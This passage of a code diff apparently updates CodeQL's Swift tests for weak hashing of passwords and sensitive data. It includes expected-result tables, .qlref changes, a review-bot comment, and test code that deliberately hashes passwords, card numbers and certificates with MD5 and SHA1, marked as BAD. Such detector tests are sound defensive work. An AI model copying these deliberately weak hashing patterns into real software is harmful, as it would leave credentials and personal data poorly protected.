testCryptoSwift.swift:179:21:179:21 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:183:9:183:9 | passwdArray | testCryptoSwift.swift:183:9:183:9 | passwdArray | testCryptoSwift.swift:183:9:183:9 | passwdArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:183:9:183:9 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:186:9:186:9 | passwdArray | testCryptoSwift.swift:186:9:186:9 | passwdArray | testCryptoSwift.swift:186:9:186:9 | passwdArray | Insecure hashing algorithm (SHA1) depends on $@. 
| testCryptoSwift.swift:186:9:186:9 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:189:9:189:9 | passwdArray | testCryptoSwift.swift:189:9:189:9 | passwdArray | testCryptoSwift.swift:189:9:189:9 | passwdArray | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:189:9:189:9 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:192:9:192:9 | passwdArray | testCryptoSwift.swift:192:9:192:9 | passwdArray | testCryptoSwift.swift:192:9:192:9 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:192:9:192:9 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:195:9:195:9 | passwdArray | testCryptoSwift.swift:195:9:195:9 | passwdArray | testCryptoSwift.swift:195:9:195:9 | passwdArray | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:195:9:195:9 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:201:9:201:9 | passwdData | testCryptoSwift.swift:201:9:201:9 | passwdData | testCryptoSwift.swift:201:9:201:9 | passwdData | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:201:9:201:9 | passwdData | password (passwdData) | -| testCryptoSwift.swift:204:9:204:9 | passwdData | testCryptoSwift.swift:204:9:204:9 | passwdData | testCryptoSwift.swift:204:9:204:9 | passwdData | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:204:9:204:9 | passwdData | password (passwdData) | -| testCryptoSwift.swift:207:9:207:9 | passwdData | testCryptoSwift.swift:207:9:207:9 | passwdData | testCryptoSwift.swift:207:9:207:9 | passwdData | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:207:9:207:9 | passwdData | password (passwdData) | -| testCryptoSwift.swift:210:9:210:9 | passwdData | testCryptoSwift.swift:210:9:210:9 | passwdData | testCryptoSwift.swift:210:9:210:9 | passwdData | Insecure hashing algorithm (SHA2) depends on $@. 
| testCryptoSwift.swift:210:9:210:9 | passwdData | password (passwdData) | -| testCryptoSwift.swift:213:9:213:9 | passwdData | testCryptoSwift.swift:213:9:213:9 | passwdData | testCryptoSwift.swift:213:9:213:9 | passwdData | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:213:9:213:9 | passwdData | password (passwdData) | -| testCryptoSwift.swift:219:9:219:9 | passwd | testCryptoSwift.swift:219:9:219:9 | passwd | testCryptoSwift.swift:219:9:219:9 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:219:9:219:9 | passwd | password (passwd) | -| testCryptoSwift.swift:222:9:222:9 | passwd | testCryptoSwift.swift:222:9:222:9 | passwd | testCryptoSwift.swift:222:9:222:9 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:222:9:222:9 | passwd | password (passwd) | -| testCryptoSwift.swift:225:9:225:9 | passwd | testCryptoSwift.swift:225:9:225:9 | passwd | testCryptoSwift.swift:225:9:225:9 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:225:9:225:9 | passwd | password (passwd) | -| testCryptoSwift.swift:228:9:228:9 | passwd | testCryptoSwift.swift:228:9:228:9 | passwd | testCryptoSwift.swift:228:9:228:9 | passwd | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:228:9:228:9 | passwd | password (passwd) | -| testCryptoSwift.swift:231:9:231:9 | passwd | testCryptoSwift.swift:231:9:231:9 | passwd | testCryptoSwift.swift:231:9:231:9 | passwd | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:231:9:231:9 | passwd | password (passwd) | diff --git a/swift/ql/test/query-tests/Security/CWE-328/WeakPasswordHashing.qlref b/swift/ql/test/query-tests/Security/CWE-328/WeakPasswordHashing.qlref index b2cfaab1f5cc..24744b4a4250 100644 --- a/swift/ql/test/query-tests/Security/CWE-328/WeakPasswordHashing.qlref +++ b/swift/ql/test/query-tests/Security/CWE-328/WeakPasswordHashing.qlref 
@@ -1 +1,2 @@
-queries/Security/CWE-328/WeakPasswordHashing.ql
+query: queries/Security/CWE-328/WeakPasswordHashing.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/swift/ql/test/query-tests/Security/CWE-328/WeakSensitiveDataHashing.expected b/swift/ql/test/query-tests/Security/CWE-328/WeakSensitiveDataHashing.expected
index ebb8154b0f8e..67c2e2f49302 100644
--- a/swift/ql/test/query-tests/Security/CWE-328/WeakSensitiveDataHashing.expected
+++ b/swift/ql/test/query-tests/Security/CWE-328/WeakSensitiveDataHashing.expected
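Review bot: The added `postprocess: utils/test/InlineExpectationsTestQuery.ql` line makes this test depend on inline annotations in testCryptoKit.swift and testCryptoSwift.swift, and both files are shared with the WeakSensitiveDataHashing test in the same directory. The regenerated results show the two queries flagging different lines (testCryptoSwift.swift:189, SHA512 on passwdArray, appears only in the password query's `#select`), so an untagged `// $ Alert` would presumably be wrong for one of the two queries; the annotations should carry the query id, e.g. `// $ Alert[<query-id>]`. The Swift sources are not part of this hunk, so confirm they are annotated that way and that neither .expected file gains a `testFailures` section, since a mismatch there would quietly weaken the CWE-328 regression coverage.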
@@ -1,3 +1,40 @@ +#select +| testCryptoKit.swift:86:43:86:43 | cert | testCryptoKit.swift:86:43:86:43 | cert | testCryptoKit.swift:86:43:86:43 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:86:43:86:43 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:88:43:88:43 | account_no | testCryptoKit.swift:88:43:88:43 | account_no | testCryptoKit.swift:88:43:88:43 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:88:43:88:43 | account_no | sensitive data (private information account_no) | +| testCryptoKit.swift:89:43:89:43 | credit_card_no | testCryptoKit.swift:89:43:89:43 | credit_card_no | testCryptoKit.swift:89:43:89:43 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:89:43:89:43 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:93:36:93:36 | cert | testCryptoKit.swift:93:36:93:36 | cert | testCryptoKit.swift:93:36:93:36 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:93:36:93:36 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:95:36:95:36 | account_no | testCryptoKit.swift:95:36:95:36 | account_no | testCryptoKit.swift:95:36:95:36 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:95:36:95:36 | account_no | sensitive data (private information account_no) | +| testCryptoKit.swift:96:36:96:36 | credit_card_no | testCryptoKit.swift:96:36:96:36 | credit_card_no | testCryptoKit.swift:96:36:96:36 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:96:36:96:36 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:100:44:100:44 | cert | testCryptoKit.swift:100:44:100:44 | cert | testCryptoKit.swift:100:44:100:44 | cert | Insecure hashing algorithm (SHA1) depends on $@. 
| testCryptoKit.swift:100:44:100:44 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:102:44:102:44 | account_no | testCryptoKit.swift:102:44:102:44 | account_no | testCryptoKit.swift:102:44:102:44 | account_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:102:44:102:44 | account_no | sensitive data (private information account_no) | +| testCryptoKit.swift:103:44:103:44 | credit_card_no | testCryptoKit.swift:103:44:103:44 | credit_card_no | testCryptoKit.swift:103:44:103:44 | credit_card_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:103:44:103:44 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:130:23:130:23 | cert | testCryptoKit.swift:130:23:130:23 | cert | testCryptoKit.swift:130:23:130:23 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:130:23:130:23 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:132:23:132:23 | account_no | testCryptoKit.swift:132:23:132:23 | account_no | testCryptoKit.swift:132:23:132:23 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:132:23:132:23 | account_no | sensitive data (private information account_no) | +| testCryptoKit.swift:133:23:133:23 | credit_card_no | testCryptoKit.swift:133:23:133:23 | credit_card_no | testCryptoKit.swift:133:23:133:23 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:133:23:133:23 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:139:23:139:23 | cert | testCryptoKit.swift:139:23:139:23 | cert | testCryptoKit.swift:139:23:139:23 | cert | Insecure hashing algorithm (SHA1) depends on $@. 
| testCryptoKit.swift:139:23:139:23 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:141:23:141:23 | account_no | testCryptoKit.swift:141:23:141:23 | account_no | testCryptoKit.swift:141:23:141:23 | account_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:141:23:141:23 | account_no | sensitive data (private information account_no) | +| testCryptoKit.swift:142:23:142:23 | credit_card_no | testCryptoKit.swift:142:23:142:23 | credit_card_no | testCryptoKit.swift:142:23:142:23 | credit_card_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:142:23:142:23 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:175:32:175:32 | cert | testCryptoKit.swift:175:32:175:32 | cert | testCryptoKit.swift:175:32:175:32 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:175:32:175:32 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:177:32:177:32 | account_no | testCryptoKit.swift:177:32:177:32 | account_no | testCryptoKit.swift:177:32:177:32 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:177:32:177:32 | account_no | sensitive data (private information account_no) | +| testCryptoKit.swift:178:32:178:32 | credit_card_no | testCryptoKit.swift:178:32:178:32 | credit_card_no | testCryptoKit.swift:178:32:178:32 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:178:32:178:32 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:184:32:184:32 | cert | testCryptoKit.swift:184:32:184:32 | cert | testCryptoKit.swift:184:32:184:32 | cert | Insecure hashing algorithm (SHA1) depends on $@. 
| testCryptoKit.swift:184:32:184:32 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:186:32:186:32 | account_no | testCryptoKit.swift:186:32:186:32 | account_no | testCryptoKit.swift:186:32:186:32 | account_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:186:32:186:32 | account_no | sensitive data (private information account_no) | +| testCryptoKit.swift:187:32:187:32 | credit_card_no | testCryptoKit.swift:187:32:187:32 | credit_card_no | testCryptoKit.swift:187:32:187:32 | credit_card_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:187:32:187:32 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:231:44:231:44 | value1 | testCryptoKit.swift:230:23:230:23 | cardNumber | testCryptoKit.swift:231:44:231:44 | value1 | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:230:23:230:23 | cardNumber | sensitive data (private information cardNumber) | +| testCryptoKit.swift:235:39:235:39 | value2 | testCryptoKit.swift:233:23:233:23 | cardNumber | testCryptoKit.swift:235:39:235:39 | value2 | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:233:23:233:23 | cardNumber | sensitive data (private information cardNumber) | +| testCryptoKit.swift:238:51:238:51 | value3 | testCryptoKit.swift:237:23:237:23 | cardNumber | testCryptoKit.swift:238:51:238:51 | value3 | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:237:23:237:23 | cardNumber | sensitive data (private information cardNumber) | +| testCryptoKit.swift:251:43:251:43 | value | testCryptoKit.swift:240:23:240:23 | cardNumber | testCryptoKit.swift:251:43:251:43 | value | Insecure hashing algorithm (MD5) depends on $@. 
| testCryptoKit.swift:240:23:240:23 | cardNumber | sensitive data (private information cardNumber) | +| testCryptoKit.swift:255:37:255:37 | value | testCryptoKit.swift:243:23:243:23 | cardNumber | testCryptoKit.swift:255:37:255:37 | value | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:243:23:243:23 | cardNumber | sensitive data (private information cardNumber) | +| testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | sensitive data (private information phoneNumberArray) | +| testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | sensitive data (private information phoneNumberArray) | +| testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | sensitive data (private information phoneNumberArray) | +| testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | sensitive data (private information phoneNumberArray) | +| testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | Insecure hashing algorithm (MD5) depends on $@. 
| testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | sensitive data (private information phoneNumberArray) | +| testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | sensitive data (private information phoneNumberArray) | +| testCryptoSwift.swift:200:9:200:9 | medicalData | testCryptoSwift.swift:200:9:200:9 | medicalData | testCryptoSwift.swift:200:9:200:9 | medicalData | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:200:9:200:9 | medicalData | sensitive data (private information medicalData) | +| testCryptoSwift.swift:203:9:203:9 | medicalData | testCryptoSwift.swift:203:9:203:9 | medicalData | testCryptoSwift.swift:203:9:203:9 | medicalData | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:203:9:203:9 | medicalData | sensitive data (private information medicalData) | +| testCryptoSwift.swift:218:9:218:9 | creditCardNumber | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | sensitive data (private information creditCardNumber) | +| testCryptoSwift.swift:221:9:221:9 | creditCardNumber | testCryptoSwift.swift:221:9:221:9 | creditCardNumber | testCryptoSwift.swift:221:9:221:9 | creditCardNumber | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:221:9:221:9 | creditCardNumber | sensitive data (private information creditCardNumber) | edges | testCryptoKit.swift:230:18:230:38 | call to Data.init(_:) | testCryptoKit.swift:231:44:231:44 | value1 | provenance | | | testCryptoKit.swift:230:23:230:23 | cardNumber | testCryptoKit.swift:230:23:230:34 | .utf8 | provenance | | 
@@ -75,40 +112,3 @@ nodes | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | semmle.label | creditCardNumber | | testCryptoSwift.swift:221:9:221:9 | creditCardNumber | semmle.label | creditCardNumber | subpaths -#select -| testCryptoKit.swift:86:43:86:43 | cert | testCryptoKit.swift:86:43:86:43 | cert | testCryptoKit.swift:86:43:86:43 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:86:43:86:43 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:88:43:88:43 | account_no | testCryptoKit.swift:88:43:88:43 | account_no | testCryptoKit.swift:88:43:88:43 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:88:43:88:43 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:89:43:89:43 | credit_card_no | testCryptoKit.swift:89:43:89:43 | credit_card_no | testCryptoKit.swift:89:43:89:43 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:89:43:89:43 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:93:36:93:36 | cert | testCryptoKit.swift:93:36:93:36 | cert | testCryptoKit.swift:93:36:93:36 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:93:36:93:36 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:95:36:95:36 | account_no | testCryptoKit.swift:95:36:95:36 | account_no | testCryptoKit.swift:95:36:95:36 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:95:36:95:36 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:96:36:96:36 | credit_card_no | testCryptoKit.swift:96:36:96:36 | credit_card_no | testCryptoKit.swift:96:36:96:36 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. 
| testCryptoKit.swift:96:36:96:36 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:100:44:100:44 | cert | testCryptoKit.swift:100:44:100:44 | cert | testCryptoKit.swift:100:44:100:44 | cert | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:100:44:100:44 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:102:44:102:44 | account_no | testCryptoKit.swift:102:44:102:44 | account_no | testCryptoKit.swift:102:44:102:44 | account_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:102:44:102:44 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:103:44:103:44 | credit_card_no | testCryptoKit.swift:103:44:103:44 | credit_card_no | testCryptoKit.swift:103:44:103:44 | credit_card_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:103:44:103:44 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:130:23:130:23 | cert | testCryptoKit.swift:130:23:130:23 | cert | testCryptoKit.swift:130:23:130:23 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:130:23:130:23 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:132:23:132:23 | account_no | testCryptoKit.swift:132:23:132:23 | account_no | testCryptoKit.swift:132:23:132:23 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:132:23:132:23 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:133:23:133:23 | credit_card_no | testCryptoKit.swift:133:23:133:23 | credit_card_no | testCryptoKit.swift:133:23:133:23 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. 
| testCryptoKit.swift:133:23:133:23 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:139:23:139:23 | cert | testCryptoKit.swift:139:23:139:23 | cert | testCryptoKit.swift:139:23:139:23 | cert | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:139:23:139:23 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:141:23:141:23 | account_no | testCryptoKit.swift:141:23:141:23 | account_no | testCryptoKit.swift:141:23:141:23 | account_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:141:23:141:23 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:142:23:142:23 | credit_card_no | testCryptoKit.swift:142:23:142:23 | credit_card_no | testCryptoKit.swift:142:23:142:23 | credit_card_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:142:23:142:23 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:175:32:175:32 | cert | testCryptoKit.swift:175:32:175:32 | cert | testCryptoKit.swift:175:32:175:32 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:175:32:175:32 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:177:32:177:32 | account_no | testCryptoKit.swift:177:32:177:32 | account_no | testCryptoKit.swift:177:32:177:32 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:177:32:177:32 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:178:32:178:32 | credit_card_no | testCryptoKit.swift:178:32:178:32 | credit_card_no | testCryptoKit.swift:178:32:178:32 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. 
| testCryptoKit.swift:178:32:178:32 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:184:32:184:32 | cert | testCryptoKit.swift:184:32:184:32 | cert | testCryptoKit.swift:184:32:184:32 | cert | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:184:32:184:32 | cert | sensitive data (credential cert) | -| testCryptoKit.swift:186:32:186:32 | account_no | testCryptoKit.swift:186:32:186:32 | account_no | testCryptoKit.swift:186:32:186:32 | account_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:186:32:186:32 | account_no | sensitive data (private information account_no) | -| testCryptoKit.swift:187:32:187:32 | credit_card_no | testCryptoKit.swift:187:32:187:32 | credit_card_no | testCryptoKit.swift:187:32:187:32 | credit_card_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:187:32:187:32 | credit_card_no | sensitive data (private information credit_card_no) | -| testCryptoKit.swift:231:44:231:44 | value1 | testCryptoKit.swift:230:23:230:23 | cardNumber | testCryptoKit.swift:231:44:231:44 | value1 | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:230:23:230:23 | cardNumber | sensitive data (private information cardNumber) | -| testCryptoKit.swift:235:39:235:39 | value2 | testCryptoKit.swift:233:23:233:23 | cardNumber | testCryptoKit.swift:235:39:235:39 | value2 | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:233:23:233:23 | cardNumber | sensitive data (private information cardNumber) | -| testCryptoKit.swift:238:51:238:51 | value3 | testCryptoKit.swift:237:23:237:23 | cardNumber | testCryptoKit.swift:238:51:238:51 | value3 | Insecure hashing algorithm (MD5) depends on $@. 
| testCryptoKit.swift:237:23:237:23 | cardNumber | sensitive data (private information cardNumber) | -| testCryptoKit.swift:251:43:251:43 | value | testCryptoKit.swift:240:23:240:23 | cardNumber | testCryptoKit.swift:251:43:251:43 | value | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:240:23:240:23 | cardNumber | sensitive data (private information cardNumber) | -| testCryptoKit.swift:255:37:255:37 | value | testCryptoKit.swift:243:23:243:23 | cardNumber | testCryptoKit.swift:255:37:255:37 | value | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:243:23:243:23 | cardNumber | sensitive data (private information cardNumber) | -| testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | sensitive data (private information phoneNumberArray) | -| testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | sensitive data (private information phoneNumberArray) | -| testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | sensitive data (private information phoneNumberArray) | -| testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | Insecure hashing algorithm (SHA1) depends on $@. 
| testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | sensitive data (private information phoneNumberArray) | -| testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | sensitive data (private information phoneNumberArray) | -| testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | sensitive data (private information phoneNumberArray) | -| testCryptoSwift.swift:200:9:200:9 | medicalData | testCryptoSwift.swift:200:9:200:9 | medicalData | testCryptoSwift.swift:200:9:200:9 | medicalData | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:200:9:200:9 | medicalData | sensitive data (private information medicalData) | -| testCryptoSwift.swift:203:9:203:9 | medicalData | testCryptoSwift.swift:203:9:203:9 | medicalData | testCryptoSwift.swift:203:9:203:9 | medicalData | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:203:9:203:9 | medicalData | sensitive data (private information medicalData) | -| testCryptoSwift.swift:218:9:218:9 | creditCardNumber | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | sensitive data (private information creditCardNumber) | -| testCryptoSwift.swift:221:9:221:9 | creditCardNumber | testCryptoSwift.swift:221:9:221:9 | creditCardNumber | testCryptoSwift.swift:221:9:221:9 | creditCardNumber | Insecure hashing algorithm (SHA1) depends on $@. 
| testCryptoSwift.swift:221:9:221:9 | creditCardNumber | sensitive data (private information creditCardNumber) |
diff --git a/swift/ql/test/query-tests/Security/CWE-328/WeakSensitiveDataHashing.qlref b/swift/ql/test/query-tests/Security/CWE-328/WeakSensitiveDataHashing.qlref
index 85270fde2999..d76eeef6c2f2 100644
--- a/swift/ql/test/query-tests/Security/CWE-328/WeakSensitiveDataHashing.qlref
+++ b/swift/ql/test/query-tests/Security/CWE-328/WeakSensitiveDataHashing.qlref
@@ -1 +1,2 @@
-queries/Security/CWE-328/WeakSensitiveDataHashing.ql
+query: queries/Security/CWE-328/WeakSensitiveDataHashing.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/swift/ql/test/query-tests/Security/CWE-328/testCryptoKit.swift b/swift/ql/test/query-tests/Security/CWE-328/testCryptoKit.swift
index 6869805e65aa..c705584d2d48 100644
--- a/swift/ql/test/query-tests/Security/CWE-328/testCryptoKit.swift
+++ b/swift/ql/test/query-tests/Security/CWE-328/testCryptoKit.swift
@@ -81,43 +81,43 @@ enum Insecure { // --- tests --- func testHashMethods(passwd : UnsafeRawBufferPointer, cert: String, encrypted_passwd : String, account_no : String, credit_card_no : String) { - var hash = Crypto.Insecure.MD5.hash(data: passwd) // BAD - hash = Crypto.Insecure.MD5.hash(bufferPointer: passwd) // BAD - hash = Crypto.Insecure.MD5.hash(data: cert) // BAD + var hash = Crypto.Insecure.MD5.hash(data: passwd) // BAD // $ Alert[swift/weak-password-hashing] + hash = Crypto.Insecure.MD5.hash(bufferPointer: passwd) // BAD // $ Alert[swift/weak-password-hashing] + hash = Crypto.Insecure.MD5.hash(data: cert) // BAD // $ Alert[swift/weak-sensitive-data-hashing] hash = Crypto.Insecure.MD5.hash(data: encrypted_passwd) // GOOD (not sensitive) - hash = Crypto.Insecure.MD5.hash(data: account_no) // BAD - hash = Crypto.Insecure.MD5.hash(data: credit_card_no) // BAD + hash = Crypto.Insecure.MD5.hash(data: account_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] + hash = Crypto.Insecure.MD5.hash(data: credit_card_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] - hash = Insecure.MD5.hash(data: passwd) // BAD - hash = Insecure.MD5.hash(bufferPointer: passwd) // BAD - hash = Insecure.MD5.hash(data: cert) // BAD + hash = Insecure.MD5.hash(data: passwd) // BAD // $ Alert[swift/weak-password-hashing] + hash = Insecure.MD5.hash(bufferPointer: passwd) // BAD // $ Alert[swift/weak-password-hashing] + hash = Insecure.MD5.hash(data: cert) // BAD // $ Alert[swift/weak-sensitive-data-hashing] hash = Insecure.MD5.hash(data: encrypted_passwd) // GOOD (not sensitive) - hash = Insecure.MD5.hash(data: account_no) // BAD - hash = Insecure.MD5.hash(data: credit_card_no) // BAD + hash = Insecure.MD5.hash(data: account_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] + hash = Insecure.MD5.hash(data: credit_card_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] - hash = Crypto.Insecure.SHA1.hash(data: passwd) // BAD - hash = 
